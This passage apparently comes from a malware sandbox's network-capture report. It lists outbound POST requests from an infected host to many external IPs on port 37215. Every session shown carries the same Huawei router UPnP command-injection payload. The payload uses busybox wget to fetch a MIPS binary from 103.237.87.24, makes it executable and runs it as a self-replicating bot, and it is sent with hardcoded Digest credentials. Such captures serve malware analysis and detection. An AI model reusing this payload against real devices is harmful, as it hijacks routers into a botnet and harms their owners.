2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1986192.168.2.1352330157.45.27.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573235035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1987192.168.2.134610441.8.204.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573235989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1988192.168.2.1345842197.12.92.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573280096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1989192.168.2.1360684157.218.17.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573290110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1990192.168.2.134025241.181.193.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573323965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1991192.168.2.1342516197.107.216.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573333025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1992192.168.2.1359352157.124.132.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573388100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1993192.168.2.133548241.138.219.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573389053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1994192.168.2.135986441.166.131.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573426962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1995192.168.2.133367841.224.2.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573441982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1996192.168.2.1360744197.152.72.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573471069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
